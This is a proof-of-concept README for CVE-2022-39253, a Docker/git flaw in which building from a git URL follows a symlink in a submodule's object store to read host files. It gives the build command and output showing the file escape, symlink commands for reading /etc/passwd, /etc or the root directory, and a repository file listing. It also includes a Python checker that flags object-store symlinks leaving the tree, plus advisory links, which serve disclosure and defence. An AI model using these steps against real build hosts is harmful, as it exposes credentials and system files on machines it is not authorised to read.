Introduction
# Docker host file read (using CVE-2022-39253) PoC
## PoC
<details>
<summary> reproduce environment </summary>
```
$ docker run --name=cve-2022-39253 -ti -d ssst0n3/docker_archive:git_cve-2022-39253
$ docker attach --detach-keys ctrl-x cve-2022-39253
# (use ctrl-x to exit container's terminal)
# (wait a few minutes for the environment to start ...)
...
Ubuntu 22.04 LTS ubuntu ttyS0
ubuntu login: root
Password: root
root@ubuntu:~# apt list --installed |grep "git/now"
WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
git/now 1:2.34.1-1ubuntu1.2 amd64 [installed,upgradable to: 1:2.34.1-1ubuntu1.6]
root@ubuntu:~# docker --version
Docker version 20.10.19, build d85ef84
```
</details>
```
echo "*************escaped*************" > /tmp/escaped
docker build https://github.com/ssst0n3/docker-cve-2022-39253-poc.git#main
```
```
Sending build context to Docker daemon 234kB
Step 1/4 : FROM busybox
latest: Pulling from library/busybox
45a0cdc5c8d3: Pull complete
Digest: sha256:3b3128d9df6bbbcc92e2358e596c9fbd722a437a62bafbc51607970e9e3b8869
Status: Downloaded newer image for busybox:latest
---> 334e4a014c81
Step 2/4 : COPY / /
---> 9f2e7d6efffd
Step 3/4 : RUN ls -lah /.git/modules/evil/objects/host
---> Running in e21e9a9c8294
-rw-r--r-- 1 root root 8 Dec 21 02:26 /.git/modules/evil/objects/host
Removing intermediate container e21e9a9c8294
---> c87453ca2a37
Step 4/4 : RUN cat /.git/modules/evil/objects/host
---> Running in a0463dca30b7
*************escaped*************
Removing intermediate container a0463dca30b7
---> 2330735e84e4
Successfully built 2330735e84e4
```
## How to read other files or directories
```
ln -s /etc/passwd evil2/git/objects/host
```
or
```
ln -s /etc evil2/git/objects/host
```
You can even read the root directory `/`.
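
A pre-build check for the layout this PoC depends on, written as an added example (not part of the PoC repository): it walks a checkout, finds every Git object store (an `objects` entry beside a `HEAD` file) and reports the symlinks in it, flagging targets that resolve outside the scanned tree. The function names and the sample tree, which mirrors `evil2/git/objects/host -> /tmp/escaped` from the file listing on this page, are constructed for illustration.

```python
import os
import sys
import tempfile


def find_object_symlinks(root):
    """Return (relative_path, link_target, escapes_root) for each symlink found
    in a Git object store, i.e. an `objects` entry sitting beside a HEAD file."""
    root = os.path.realpath(root)
    findings = []
    for dirpath, _dirs, filenames in os.walk(root, followlinks=False):
        store = os.path.join(dirpath, "objects")
        if "HEAD" not in filenames or not os.path.lexists(store):
            continue
        candidates = [store]  # the store itself may be a symlink
        if not os.path.islink(store):
            for sub, dirs, files in os.walk(store, followlinks=False):
                candidates += [os.path.join(sub, name) for name in dirs + files]
        for path in candidates:
            if not os.path.islink(path):
                continue
            resolved = os.path.realpath(path)
            escapes = os.path.commonpath([root, resolved]) != root
            findings.append((os.path.relpath(path, root), os.readlink(path), escapes))
    return findings


def build_sample_tree(root):
    """Constructed sample: same shape as the evil2/git directory in the listing."""
    objects = os.path.join(root, "evil2", "git", "objects")
    os.makedirs(os.path.join(objects, "info"))
    for path in (os.path.join(root, "evil2", "git", "HEAD"),
                 os.path.join(objects, "info", "packs")):
        open(path, "w").close()
    os.symlink("/tmp/escaped", os.path.join(objects, "host"))  # points outside
    os.symlink("info/packs", os.path.join(objects, "alias"))   # stays inside


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = find_object_symlinks(sys.argv[1])
    else:
        with tempfile.TemporaryDirectory() as tmp:
            build_sample_tree(tmp)
            results = find_object_symlinks(tmp)
    for rel, target, escapes in results:
        print(("OUTSIDE " if escapes else "inside  ") + rel + " -> " + target)
    sys.exit(1 if any(e for _, _, e in results) else 0)
```

Run it with a checkout path as the only argument before handing that directory to a build; a non-zero exit status means at least one object-store symlink leaves the tree.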
## Security Advisories
* https://github.com/moby/moby/security/advisories/GHSA-vp35-85q5-9f25
* https://github.com/git/git/security/advisories/GHSA-3wp6-j8xr-qw85
File snapshot
```
[4.0K] /data/pocs/00089b0351096465b6d6deb1eb77c864a5acc7d5
├── [ 172] Dockerfile
├── [4.0K] evil
├── [4.0K] evil2
│   └── [4.0K] git
│       ├── [   5] COMMIT_EDITMSG
│       ├── [  92] config
│       ├── [  73] description
│       ├── [  23] HEAD
│       ├── [4.0K] hooks
│       │   ├── [ 478] applypatch-msg.sample
│       │   ├── [ 896] commit-msg.sample
│       │   ├── [ 189] post-update.sample
│       │   ├── [ 424] pre-applypatch.sample
│       │   ├── [1.6K] pre-commit.sample
│       │   ├── [ 416] pre-merge-commit.sample
│       │   ├── [1.5K] prepare-commit-msg.sample
│       │   ├── [1.3K] pre-push.sample
│       │   ├── [4.8K] pre-rebase.sample
│       │   ├── [ 544] pre-receive.sample
│       │   ├── [2.7K] push-to-checkout.sample
│       │   └── [3.6K] update.sample
│       ├── [ 137] index
│       ├── [4.0K] info
│       │   ├── [ 240] exclude
│       │   └── [  59] refs
│       ├── [4.0K] logs
│       │   ├── [ 150] HEAD
│       │   └── [4.0K] refs
│       │       └── [4.0K] heads
│       │           └── [ 150] master
│       ├── [4.0K] objects
│       │   ├── [4.0K] e6
│       │   │   └── [  15] 9de29bb2d1d6434b8b29ae775ad8c2e48c5391
│       │   ├── [4.0K] f6
│       │   │   └── [ 122] 6ae89dec4c3bcdc5e26a05013f9e81a9d289ac
│       │   ├── [4.0K] f9
│       │   │   └── [  54] 3e3a1a1525fb5b91020da86e44810c87a2d7bc
│       │   ├── [  12] host -> /tmp/escaped
│       │   └── [4.0K] info
│       │       └── [   1] packs
│       └── [4.0K] refs
│           └── [4.0K] heads
│               └── [  41] master
└── [1.9K] README.md

15 directories, 29 files
```